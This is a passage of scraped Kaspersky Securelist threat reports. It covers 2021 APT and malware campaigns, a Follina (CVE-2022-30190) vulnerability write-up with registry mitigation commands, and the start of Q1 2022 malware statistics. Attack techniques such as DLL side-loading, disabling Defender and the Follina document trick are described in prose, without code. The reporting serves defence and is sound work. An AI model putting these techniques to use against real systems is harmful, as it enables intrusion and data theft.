Mobile statistics](<https://securelist.com/it-threat-evolution-in-q3-2021-mobile-statistics/105020/>)\n\n## Targeted attacks\n\n### WildPressure targets macOS\n\nLast March, we reported a [WildPressure campaign targeting industrial-related entities in the Middle East](<https://securelist.com/wildpressure-targets-industrial-in-the-middle-east/96360/>). While tracking this threat actor in spring 2021, we discovered a newer version. It contains the C++ Milum Trojan, a corresponding VBScript variant and a set of modules that include an orchestrator and three plugins. This confirms our previous assumption that there were more last-stagers besides the C++ ones.\n\nAnother language used by WildPressure is Python. The PyInstaller module for Windows contains a script named "Guard". Interestingly, this malware was developed for both Windows and macOS operating systems. The coding style, overall design and C2 communication protocol are quite recognizable across all three programming languages used by the authors.\n\nWildPressure used both virtual private servers (VPS) and compromised servers in its infrastructure, most of which were WordPress websites.\n\nWe have very limited visibility for the samples described in our report, but our telemetry suggests that the targets in this campaign were also from the oil and gas industry.\n\nYou can view our report on the new version [here](<https://securelist.com/wildpressure-targets-macos/103072/>), together with a video presentation of our findings.\n\n### LuminousMoth: sweeping attacks for the chosen few\n\nWe recently uncovered a large-scale and highly active attack against targets in Southeast Asia by a threat actor that we call [LuminousMoth](<https://securelist.com/apt-luminousmoth/103332/>). The campaign dates back to October last year and was still ongoing at the time we published our public report in July. Most of the early sightings were in Myanmar, but it seems the threat actor is now much more active in the Philippines. 
Targets include high-profile organizations: namely, government entities located both within those countries and abroad.\n\nMost APT threats carefully select their targets and tailor the infection vectors, implants and payloads to the victims' identities or environment. It's not often we observe a large-scale attack by APT threat actors \u2013 they usually avoid such attacks because they are too 'noisy' and risk drawing attention to the campaign. LuminousMoth is an exception. We observed a high number of infections; although we think the campaign was aimed at a few targets of interest.\n\nThe attackers obtain initial access to a system by sending a spear-phishing email to the victim containing a Dropbox download link. The link leads to a RAR archive that masquerades as a Word document. The archive contains two malicious DLL libraries as well as two legitimate executables that side-load the DLL files. We found multiple archives like this with file names of government entities linked to Myanmar.\n\nWe also observed a second infection vector that comes into play after the first one has successfully finished. 
The malware tries to spread to other hosts on the network by infecting USB drives.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/07/12153755/LuminousMoth_01.png>)\n\nIn addition to the malicious DLLs, the attackers also deployed a signed, but fake version of the popular application Zoom on some infected systems, enabling them to exfiltrate data.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/07/12154002/LuminousMoth_05.png>)\n\nThe threat actor also deploys an additional tool that accesses a victim's Gmail session by stealing cookies from the Chrome browser.\n\nInfrastructure ties as well as shared TTPs allude to a possible connection between LuminousMoth and the HoneyMyte threat group, which has been seen targeting the same region using similar tools in the past.\n\n### Targeted attacks exploiting CVE-2021-40444\n\nOn September 7, [Microsoft reported a zero-day vulnerability](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>) (CVE-2021-40444) that could allow an attacker to execute code remotely on vulnerable computers. The vulnerability is in MSHTML, the Internet Explorer engine. Even though few people use IE nowadays, some programs use its engine to handle web content \u2013 in particular, Microsoft Office applications.\n\nWe [have seen targeted attacks](<https://securelist.com/exploitation-of-the-cve-2021-40444-vulnerability-in-mshtml/104218/>) exploiting the vulnerability to target companies in research and development, the energy sector and other major industries, banking, the medical technology sector, as well as telecoms and IT.\n\nTo exploit the vulnerability, attackers embed a special object in a Microsoft Office document containing a URL for a malicious script. If the victim opens the document, Microsoft Office downloads the script and runs it using the MSHTML engine. 
Then the script can use ActiveX controls to perform malicious actions on the victim's computer.\n\n### Tomiris backdoor linked to SolarWinds attack\n\nThe SolarWinds incident last December stood out because of the extreme carefulness of the attackers and the high-profile nature of their victims. The evidence suggests that the threat actor behind the attack, DarkHalo (aka Nobelium), had spent six months inside OrionIT's networks to perfect their attack. The following timeline sums up the different steps of the campaign.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/09/27145035/SAS_story_Tomiris_connection_01.png>)\n\nIn June, more than six months after DarkHalo had gone dark, we observed the DNS hijacking of multiple government zones of a CIS member state that allowed the attacker to redirect traffic from government mail servers to computers under their control \u2013 probably achieved by obtaining credentials to the control panel of the victims' registrar. When victims tried to access their corporate mail, they were redirected to a fake copy of the web interface.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/09/27145115/SAS_story_Tomiris_connection_02.png>)\n\nAfter this, they were tricked into downloading previously unknown malware. The backdoor, dubbed Tomiris, bears a number of similarities to the second-stage malware, Sunshuttle (aka GoldMax), used by DarkHalo last year. However, there are also a number of overlaps between Tomiris and Kazuar, a backdoor that has been linked to the Turla APT threat actor. None of the similarities is enough to link Tomiris and Sunshuttle with sufficient confidence. 
However, taken together they suggest the possibility of common authorship or shared development practices.\n\nYou can read our analysis [here](<https://securelist.com/darkhalo-after-solarwinds-the-tomiris-connection/104311/>).\n\n### GhostEmperor\n\nEarlier this year, while investigating the rise of attacks against Exchange servers, we noticed a recurring cluster of activity that appeared in several distinct compromised networks. We attribute the activity to a previously unknown threat actor that we have called [GhostEmperor](<https://securelist.com/ghostemperor-from-proxylogon-to-kernel-mode/104407/>). This cluster stood out because it used a formerly unknown Windows kernel mode rootkit that we dubbed Demodex; and a sophisticated multi-stage malware framework aimed at providing remote control over the attacked servers.\n\nThe rootkit is used to hide the user mode malware's artefacts from investigators and security solutions, while demonstrating an interesting loading scheme involving the kernel mode component of an open-source project named Cheat Engine to bypass the Windows Driver Signature Enforcement mechanism.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/09/29150203/Ghost_Emperor_06.png>)\n\nWe identified multiple attack vectors that triggered an infection chain leading to the execution of the malware in memory. The majority of GhostEmperor infections were deployed on public-facing servers, as many of the malicious artefacts were installed by the httpd.exe Apache server process, the w3wp.exe IIS Windows server process, or the oc4j.jar Oracle server process. 
This means that the attackers probably abused vulnerabilities in the web applications running on those systems, allowing them to drop and execute their files.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/09/29150042/Ghost_Emperor_04.png>)\n\nAlthough infections often start with a BAT file, in some cases the known infection chain was preceded by an earlier stage: a malicious DLL that was side-loaded by wdichost.exe, a legitimate Microsoft command line utility (originally called MpCmdRun.exe). The side-loaded DLL then proceeds to decode and load an additional executable called license.rtf. Unfortunately, we did not manage to retrieve this executable, but we saw that the consecutive actions of loading it included the creation and execution of GhostEmperor scripts by wdichost.exe.\n\nThis toolset was in use from as early as July 2020, mainly targeting Southeast Asian entities, including government agencies and telecoms companies.\n\n### FinSpy: analysis of current capabilities\n\nAt the end of September, at the Kaspersky [Security Analyst Summit](<https://thesascon.com/>), our researchers provided an [overview of FinSpy](<https://securelist.com/finspy-unseen-findings/104322/>), an infamous surveillance toolset that several NGOs have repeatedly reported being used against journalists, political dissidents and human rights activists. Our analysis included not only the Windows version of FinSpy, but also Linux and macOS versions, which share the same internal structure and features.\n\nAfter 2018, we observed falling detection rates for FinSpy for Windows. However, it never actually went away \u2013 it was simply using various first-stage implants to hide its activities. 
We started detecting some suspicious backdoored installer packages (including TeamViewer, VLC Media Player and WinRAR); then in the middle of 2019 we found a host that served these installers along with FinSpy Mobile implants for Android.\n\nThe authors have gone to great lengths to make FinSpy inaccessible to security researchers \u2013 it seems they have put as much work into anti-analysis and obfuscation as they have into the Trojan itself. First, the samples are protected with multiple layers of evasion tactics.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/09/24151828/SAS_story_FinFisher_02.png>)\n\nMoreover, once the Trojan has been installed, it is heavily camouflaged using four complex, custom-made obfuscators.\n\nApart from Trojanized installers, we also observed infections involving use of a UEFI (Unified Extensible Firmware Interface) and MBR (Master Boot Record) bootkit. While the MBR infection has been known since at least 2014, details on the UEFI bootkit were publicly revealed for the first time in our private report on FinSpy.\n\nThe user of a smartphone or tablet can be infected through a link in a text message. In some cases (for example, if the victim's iPhone has not been [jailbroken](<https://encyclopedia.kaspersky.com/glossary/jailbreak/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>)), the attacker may need physical access to the device.\n\n## Other malware\n\n### REvil attack on MSPs and their customers worldwide\n\nAn attack perpetrated by the REvil Ransomware-as-a-Service gang (aka Sodinokibi) targeting Managed Service Providers (MSPs) and their clients was discovered on July 2.\n\nThe attackers [identified and exploited](<https://threatpost.com/kaseya-patches-zero-day-exploits/167548/>) a zero-day vulnerability in the Kaseya Virtual System/Server Administrator (VSA) platform. 
The VSA software, used by Kaseya customers to remotely monitor and manage software and network infrastructure, is supplied either as a cloud service or via on-premises VSA servers.\n\nThe exploit involved deploying a malicious dropper via a PowerShell script. The script disabled Microsoft Defender features and then used the certutil.exe utility to decode a malicious executable (agent.exe) that dropped an older version of Microsoft Defender, along with the REvil ransomware packed into a malicious library. That library was then loaded by the legitimate MsMpEng.exe by utilizing the DLL side-loading technique.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/07/05113533/02-revil-attacks-msp.png>)\n\nThe attack is estimated to have resulted in the encryption of files belonging to around 60 Kaseya customers using the on-premises version of the platform. Many of them were MSPs who use VSA to manage the networks of other businesses. This MSP connection gave REvil access to those businesses, and Kaseya estimated that [around 1,500 downstream businesses were affected](<https://helpdesk.kaseya.com/hc/en-gb/articles/4403440684689-Important-Notice-July-2nd-2021>).\n\nUsing our Threat Intelligence service, we observed more than 5,000 attack attempts in 22 countries by the time [our analysis of the attack](<https://securelist.com/revil-ransomware-attack-on-msp-companies/103075/>) was published.\n\n### What a [Print]Nightmare\n\nEarly in July, Microsoft published an alert about vulnerabilities in the Windows Print Spooler service. The vulnerabilities, [CVE-2021-1675](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1675>) and [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34527>) (aka PrintNightmare), can be used by an attacker with a regular user account to take control of a vulnerable server or client machine that runs the Windows Print Spooler service. 
This service is enabled by default on all Windows clients and servers, including domain controllers, making both vulnerabilities potentially very dangerous.\n\nMoreover, owing to a misunderstanding between teams of researchers, a [proof-of-concept](<https://encyclopedia.kaspersky.com/glossary/poc-proof-of-concept/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) (PoC) exploit for PrintNightmare was [published](<https://therecord.media/poc-released-for-dangerous-windows-printnightmare-bug/>) online. The researchers involved believed that Microsoft's Patch Tuesday release in June had already solved the problem, so they shared their work with the expert community. However, while Microsoft had published a patch for CVE-2021-1675, the PrintNightmare vulnerability remained unpatched until July. The PoC was quickly removed, but not before it had been copied multiple times.\n\nCVE-2021-1675 is a [privilege elevation](<https://encyclopedia.kaspersky.com/glossary/privilege-escalation/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) vulnerability, allowing an attacker with low access privileges to craft and use a malicious DLL file to run an exploit and gain higher privileges. 
However, that is only possible if the attacker already has direct access to the vulnerable computer in question.\n\nCVE-2021-34527 is significantly more dangerous because it is a [remote code execution](<https://encyclopedia.kaspersky.com/glossary/remote-code-execution-rce/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) (RCE) vulnerability, which means it allows remote injection of DLLs.\n\nYou can find a more detailed technical description of both vulnerabilities [here](<https://securelist.com/quick-look-at-cve-2021-1675-cve-2021-34527-aka-printnightmare/103123/>).\n\n### Grandoreiro and Melcoz arrests\n\nIn July, the Spanish Ministry of the Interior [announced](<http://www.interior.gob.es/prensa/noticias/-/asset_publisher/GHU8Ap6ztgsg/content/id/13552853>) the arrest of 16 people connected to the [Grandoreiro and Melcoz (aka Mekotio) cybercrime groups](<https://securelist.com/arrests-of-members-of-tetrade-seed-groups-grandoreiro-and-melcoz/103366/>). Both groups are originally from Brazil and form part of the [Tetrade umbrella](<https://securelist.com/the-tetrade-brazilian-banking-malware/97779/>), operating for a few years now in Latin America and Western Europe.\n\nThe Grandoreiro banking Trojan malware family initially started its operations in Brazil and then expanded its operations to other Latin American countries and then to Western Europe. The group has regularly improved its techniques; and, based on our analysis of the group's campaigns, it operates as a [malware-as-a-service (MaaS)](<https://encyclopedia.kaspersky.com/glossary/malware-as-a-service-maas/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) project. 
Our telemetry shows that, since January 2020, Grandoreiro has mainly attacked victims in Brazil, Mexico, Spain, Portugal and Turkey.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/07/14175031/tetrade_arrest_01.png>)\n\nMelcoz had been active in Brazil since at least 2018, before expanding overseas. We observed the group attacking assets in Chile in 2018 and, more recently, in Mexico: it's likely that there are victims in other countries too, as some of the targeted banks have international operations. As a rule, the malware uses AutoIt or VBS scripts, added into MSI files, which run malicious DLLs using the DLL-Hijack technique, aiming to bypass security solutions. The malware steals passwords from browsers and from the device's memory, providing remote access to capture internet banking access. It also includes a Bitcoin wallet stealing module. Our telemetry confirms that, since January 2020, Melcoz has been actively targeting Brazil, Chile and Spain, among other countries.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/07/14175038/tetrade_arrest_02.png>)\n\nSince both malware families are from Brazil, the individuals arrested in Spain are just operators. So, it's likely that the creators of Grandoreiro and Melcoz will continue to develop new malware techniques and recruit new members in their countries of interest.\n\n### Gamers beware\n\nEarlier this year, we discovered an ad in an underground forum for a piece of malware dubbed BloodyStealer by its creators. 
The malware is designed to steal passwords, cookies, bank card details, browser auto-fill data, device information, screenshots, desktop and client uTorrent files, Bethesda, Epic Games, GOG, Origin, Steam, Telegram, and VimeWorld client sessions and logs.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/11/16141037/bloodystealer-and-gaming-accounts-in-darknet-screen-1.png>)\n\n**_The BloodyStealer ad (Source: [https://twitter.com/3xp0rtblog](<https://twitter.com/3xp0rtblog/status/1380087553676697617>))_**\n\nThe authors of the malware, which has hit users in Europe, Latin America and the Asia-Pacific region, have adopted a MaaS distribution model, meaning that anyone can buy it for the modest price of around $10 per month (roughly $40 for a "lifetime license").\n\nOn top of its theft functions, the malware includes tools to thwart analysis. It sends stolen information as a ZIP archive to the C2 (command-and-control) server, which is protected against DDoS (distributed denial of service) attacks. The cybercriminals use either the (quite basic) control panel or Telegram to obtain the data, including gamer accounts.\n\nBloodyStealer is just one of many tools available on the dark web for stealing gamer accounts. Moreover, underground forums often feature ads offering to post a malicious link on a popular website or selling tools to generate phishing pages automatically. Using these tools, cybercriminals can collect, and then try to monetize, a huge amount of credentials. All kinds of offers related to gamer accounts can be found on the dark web.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/11/16141127/bloodystealer-and-gaming-accounts-in-darknet-screen-2.png>)\n\nSo-called logs are among the most popular. These are databases containing reams of data for logging into accounts. 
In their ads, attackers can specify the types of data, the geography of users, the period over which the logs were collected and other details. For example, in the screenshot below, an underground forum member offers an archive with 65,600 records, of which 9,000 are linked to users from the US, and 5,000 to residents of India, Turkey and Canada. The entire archive costs $150 (that's about 0.2 cents per record).\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/11/16141203/bloodystealer-and-gaming-accounts-in-darknet-screen-3.png>)\n\nCybercriminals can also use compromised gaming accounts to launder money, distribute phishing links and conduct other illegal business.\n\nYou can read more about gaming threats, including BloodyStealer, [here](<https://securelist.com/game-related-cyberthreats/103675/>) and [here](<https://securelist.com/bloodystealer-and-gaming-assets-for-sale/104319/>).\n\n### Triada Trojan in WhatsApp mod\n\nNot everyone is happy with the official WhatsApp app, turning instead to modified WhatsApp clients for features that the WhatsApp developers haven't yet implemented in the official version. The creators of these mods often embed ads in them. However, their use of third-party ad modules can provide a mechanism for malicious code to be slipped into the app unnoticed.\n\nThis happened recently with FMWhatsApp, a popular WhatsApp mod. In version 16.80.0 the developers used a third-party ad module that includes the Triada Trojan (detected by Kaspersky's mobile antivirus as Trojan.AndroidOS.Triada.ef). This Trojan performs an intermediary function. First, it collects data about the user's device, and then, depending on the information, it downloads one of several other Trojans. 
You can find a description of the functions that these other Trojans perform in [our analysis of the infected FMWhatsApp mod](<https://securelist.com/triada-trojan-in-whatsapp-mod/103679/>).\n\n### Qakbot banking Trojan\n\nQakBot (aka QBot, QuackBot and Pinkslipbot) is a banking Trojan that was first discovered in 2007, and has been continually maintained and developed since then. It is now one of the leading banking Trojans around the globe. Its main purpose is to steal banking credentials (e.g., logins, passwords, etc.), but it has also acquired functionality allowing it to spy on financial operations, spread itself and install ransomware in order to maximize revenue from compromised organizations.\n\nThe Trojan also includes the ability to log keystrokes, backdoor functionality, and techniques to evade detection. The latter includes virtual environment detection, regular self-updates and cryptor/packer changes. QakBot also tries to protect itself from being analyzed and debugged by experts and automated tools. Another interesting piece of functionality is the ability to steal emails: these are later used by the attackers to send targeted emails to the victims, with the information obtained used to lure victims into opening those emails.\n\nQakBot is known to infect its victims mainly via spam campaigns. In some cases, the emails are delivered with Microsoft Office documents or password-protected archives with documents attached. The documents contain macros and victims are prompted to open the attachments with claims that they contain important information (e.g., an invoice). In some cases, the emails contain links to web pages distributing malicious documents.\n\nHowever, there is another infection vector that involves a malicious QakBot payload being transferred to the victim's machine via other malware on the compromised machine. 
The initial infection vectors may vary depending on what the threat actors believe has the best chance of success for the targeted organization(s). It's known that various threat actors perform reconnaissance of target organizations beforehand to decide which infection vector is most suitable.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/09/01145837/Qakbot_technical_analysis_01.png>)\n\nWe analyzed statistics on QakBot attacks collected from our Kaspersky Security Network (KSN), where anonymized data voluntarily provided by Kaspersky users is accumulated and processed. In the first seven months of 2021 our products detected 181,869 attempts to download or run QakBot. This number is lower than the detection number from January to July 2020, though the number of users affected grew by 65% \u2013 from 10,493 in the previous year to 17,316 this year.\n\n_Number of users affected by QakBot attacks from January to July in 2020 and 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/09/01155141/01-en-qakbot.png>))_\n\nYou can read our full analysis [here](<https://securelist.com/qakbot-technical-analysis/103931/>).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-26T12:00:36", "type": "securelist", "title": "IT threat evolution Q3 2021", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": 
"COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527", "CVE-2021-40444"], "modified": "2021-11-26T12:00:36", "id": "SECURELIST:86368EF0EA7DAA3D2AB20E0597A62656", "href": "https://securelist.com/it-threat-evolution-q3-2021/104876/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-08T07:56:31", "description": "\n\nAt the end of May, researchers from the nao_sec team [reported](<https://twitter.com/nao_sec/status/1530196847679401984>) a new zero-day vulnerability in Microsoft Support Diagnostic Tool (MSDT) that can be exploited using Microsoft Office documents. It allowed attackers to remotely execute code on Windows systems, while the victim could not even open the document containing the exploit, or open it in Protected Mode. The vulnerability, which the researchers dubbed Follina, later received the identifier [CVE-2022-30190](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-30190>).\n\n## CVE-2022-30190 technical details\n\nBriefly, the exploitation of the CVE-2022-30190 vulnerability can be described as follows. The attacker creates an MS Office document with a link to an external malicious OLE object (_**word/_rels/document.xml.rels**_), such as an HTML file located on a remote server. The data used to describe the link is placed in the **** tag with attributes _**Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject", Target="http_malicious_link!"**_. The link in the **Target** attribute points to the above-mentioned HTML file, inside which a malicious script is written using a special URI scheme. \nWhen opened, the attacker-created document runs MSDT. 
The attacker can then pass, through a set of parameters, any command to this tool for execution on the victim's system with the privileges of the user who opened the document. What is more, the command can be passed even if the document is opened in Protected Mode and macros are disabled. \nAt the time of posting, two document formats were known to allow CVE-2022-30190 exploitation: Microsoft Word (.docx) and Rich Text Format (.rtf). The latter is more dangerous for the potential victim because it allows execution of a malicious command even without opening the document \u2014 just previewing it in Windows Explorer is enough.\n\n## Protecting against Follina\n\nKaspersky is aware of attempts to exploit the CVE-2022-30190 vulnerability through Microsoft Office documents. Our solutions protect against this using the [Behavior Detection](<https://www.kaspersky.com/enterprise-security/wiki-section/products/behavior-based-protection>) and [Exploit Prevention](<https://www.kaspersky.com/enterprise-security/wiki-section/products/exploit-prevention>) tools. \nThe following verdict names are possible:\n\n * PDM:Exploit.Win32.Generic \n * HEUR:Exploit.MSOffice.Agent.n\n * HEUR:Exploit.MSOffice.Agent.gen \n * HEUR:Exploit.MSOffice.CVE-2017-0199.a\n * HEUR:Exploit.MSOffice.CVE-2021-40444.a\n * HEUR:Exploit.MSOffice.Generic\n\n_Geography of Follina exploitation attempts with Exploit.MSOffice.CVE-2021-40444.a verdict, May 1 \u2013 June 3, 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/08064948/01-en-cve-2022-30190.png>))_\n\nWe expect to see more Follina exploitation attempts to gain access to corporate resources, including for ransomware attacks and data breaches. Therefore, we continue to closely monitor the situation and improve overall vulnerability detection. 
In addition, as part of the [Managed Detection and Response](<https://www.kaspersky.com/enterprise-security/managed-detection-and-response>) service, our SOC experts can detect vulnerability exploitation, investigate attacks and provide clients with all necessary threat-related information. \nTo protect against Follina exploitation, we strongly advise that you follow Microsoft's own guidelines: [Guidance for CVE-2022-30190 Microsoft Support Diagnostic Tool Vulnerability](<https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/>). In particular, to prevent exploitation of this vulnerability, you can disable support for the MSDT URL protocol by taking these steps:\n\n 1. Run Command Prompt as Administrator.\n 2. To back up the registry key, execute the command "reg export HKEY_CLASSES_ROOT\\ms-msdt filename"\n 3. Execute the command "reg delete HKEY_CLASSES_ROOT\\ms-msdt /f".", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-06T08:00:02", "type": "securelist", "title": "CVE-2022-30190 (Follina) vulnerability in MSDT: description and counteraction", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, 
"obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0199", "CVE-2021-40444", "CVE-2022-30190"], "modified": "2022-06-06T08:00:02", "id": "SECURELIST:29152837444B2A7E5A9B9FCB107DAB36", "href": "https://securelist.com/cve-2022-30190-follina-vulnerability-in-msdt-description-and-counteraction/106703/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-30T13:56:48", "description": "\n\n * [IT threat evolution in Q1 2022](<https://securelist.com/it-threat-evolution-q1-2022/106513/>)\n * **IT threat evolution in Q1 2022. Non-mobile statistics**\n * [IT threat evolution in Q1 2022. Mobile statistics](<https://securelist.com/it-threat-evolution-in-q1-2022-mobile-statistics/106589/>)\n\n_These statistics are based on detection verdicts of Kaspersky products and services received from users who consented to providing statistical data._\n\n## Quarterly figures\n\nAccording to Kaspersky Security Network, in Q1 2022:\n\n * Kaspersky solutions blocked 1,216,350,437 attacks from online resources across the globe.\n * Web Anti-Virus recognized 313,164,030 unique URLs as malicious.\n * Attempts to run malware for stealing money from online bank accounts were stopped on the computers of 107,848 unique users.\n * Ransomware attacks were defeated on the computers of 74,694 unique users.\n * Our File Anti-Virus detected 58,989,058 unique malicious and potentially unwanted objects.\n\n## Financial threats\n\n### Financial threat statistics\n\nIn Q1 2022 Kaspersky solutions blocked the launch of at least one piece of malware designed to steal money from bank accounts on the computers of 107,848 unique users.\n\n_Number of unique users attacked by financial malware, Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/25231205/01-en-malware-report-q1-2022-pc.png>))_\n\n#### Geography of financial malware attacks\n\n_To evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware 
worldwide, for each country and territory we calculated the share of users of Kaspersky products who faced this threat during the reporting period as a percentage of all users of our products in that country or territory._\n\n_Geography of financial malware attacks, Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/25231231/02-en-malware-report-q1-2022-pc.png>))_\n\n**TOP 10 countries by share of attacked users**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Turkmenistan | 4.5 \n2 | Afghanistan | 4.0 \n3 | Tajikistan | 3.9 \n4 | Yemen | 2.8 \n5 | Uzbekistan | 2.4 \n6 | China | 2.2 \n7 | Azerbaijan | 2.0 \n8 | Mauritania | 2.0 \n9 | Sudan | 1.8 \n10 | Syria | 1.8 \n \n_* Excluded are countries with relatively few Kaspersky product users (under 10,000)._ \n_** Unique users whose computers were targeted by financial malware as a percentage of all unique users of Kaspersky products in the country._\n\n#### TOP 10 banking malware families\n\n| **Name** | **Verdicts** | **%*** \n---|---|---|--- \n1 | Ramnit/Nimnul | Trojan-Banker.Win32.Ramnit | 36.5 \n2 | Zbot/Zeus | Trojan-Banker.Win32.Zbot | 16.7 \n3 | CliptoShuffler | Trojan-Banker.Win32.CliptoShuffler | 6.7 \n4 | SpyEye | Trojan-Spy.Win32.SpyEye | 6.3 \n5 | Gozi | Trojan-Banker.Win32.Gozi | 5.2 \n6 | Cridex/Dridex | Trojan-Banker.Win32.Cridex | 3.5 \n7 | Trickster/Trickbot | Trojan-Banker.Win32.Trickster | 3.3 \n8 | RTM | Trojan-Banker.Win32.RTM | 2.7 \n9 | BitStealer | Trojan-Banker.Win32.BitStealer | 2.2 \n10 | Danabot | Trojan-Banker.Win32.Danabot | 1.8 \n \n_* Unique users who encountered this malware family as a percentage of all users attacked by financial malware._\n\nOur TOP 10 leader changed in Q1: the familiar ZeuS/Zbot (16.7%) dropped to second place and Ramnit/Nimnul (36.5%) took the lead. 
The TOP 3 was rounded out by CliptoShuffler (6.7%).\n\n## Ransomware programs\n\n### Quarterly trends and highlights\n\n#### Law enforcement successes\n\n * Several members of the REvil ransomware crime group were [arrested](<https://tass.com/society/1388613>) by Russian law enforcement in January. The Russian Federal Security Service (FSB) [says](<http://www.fsb.ru/fsb/press/message/single.htm!id=10439388%40fsbMessage.html>) it seized the following assets from the cybercriminals: "more than 426 million rubles ($5.6 million) including denominated in cryptocurrency; $600,000; 500,000 euros; computer equipment, the crypto wallets that were used to perpetrate crimes, and 20 luxury cars that were purchased with illicitly obtained money."\n * In February, a Canadian citizen was [sentenced](<https://www.bleepingcomputer.com/news/security/netwalker-ransomware-affiliate-sentenced-to-80-months-in-prison/>) to 6 years and 8 months in prison for involvement in NetWalker ransomware attacks (also known as Mailto ransomware).\n * In January, Ukrainian police [arrested](<https://www.bleepingcomputer.com/news/security/ukranian-police-arrests-ransomware-gang-that-hit-over-50-firms/>) a ransomware gang who delivered an unclarified strain of malware via e-mail. According to the statement released by the police, over fifty companies in the United States and Europe were attacked by the cybercriminals.\n\n#### HermeticWiper, HermeticRansom and RUransom, etc.\n\nIn February, new malware was discovered which carried out attacks with the aim of destroying files. Two pieces of malware \u2014 a Trojan called HermeticWiper that destroys data and a cryptor called [HermeticRansom](<https://securelist.com/elections-goransom-and-hermeticwiper-attack/105960/>) \u2014 were both [used](<https://www.kaspersky.com/blog/hermeticransom-hermeticwiper-attacks-2022/43825/>) in cyberattacks in Ukraine. 
That February, Ukrainian systems were attacked by another Trojan called IsaacWiper, followed by a third Trojan in March called CaddyWiper. The apparent aim of this malware family was to render infected computers unusable leaving no possibility of recovering files.\n\nAn intelligence team later discovered that HermeticRansom only superficially encrypts files, and ones encrypted by the ransomware [can be decrypted](<https://threatpost.com/free-hermeticransom-ransomware-decryptor-released/178762/>).\n\nRUransom malware was discovered in March, which was created to encrypt files on computers in Russia. The analysis of the malicious code revealed it was developed to wipe data, as RUransom generates keys for all the victim's encrypted files without storing them anywhere.\n\n#### Conti source-code leak\n\nThe ransomware group Conti had its source code leaked along with its chat logs which were made public. It happened shortly after the Conti group [expressed](<https://www.theverge.com/2022/2/28/22955246/conti-ransomware-russia-ukraine-chat-logs-leaked>) support for the Russian government's actions on its website. The true identity of the individual who leaked the data is currently unknown. According to different versions, it could have been a researcher or an insider in the group who disagrees with its 